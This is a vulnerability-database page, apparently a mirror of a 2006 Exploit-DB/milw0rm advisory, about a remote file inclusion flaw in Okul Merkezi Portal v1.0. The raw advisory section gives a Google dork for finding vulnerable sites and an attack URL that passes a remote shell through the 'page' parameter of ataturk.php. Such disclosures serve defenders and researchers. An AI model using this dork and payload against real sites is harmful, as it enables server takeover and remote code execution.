header-logo
Suggest Exploit
vendor:
Portal
by:
ShaFuck31
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Portal
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Okul Merkezi Portal v1.0

A remote file inclusion vulnerability exists in Okul Merkezi Portal v1.0. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. This is achieved by sending a maliciously crafted HTTP request containing a URL in the 'page' parameter of the 'ataturk.php' script. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Okul Merkezi Portal v1.0

# GoogLe Dork : ogrencimezunlar.php

# Script Download : http://www.okulmerkezi.com/omdemo/

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : ataturk.php

#Vuln :
http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL]

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# milw0rm.com [2006-12-25]

Navigation

Suggest Exploit

Services By CQR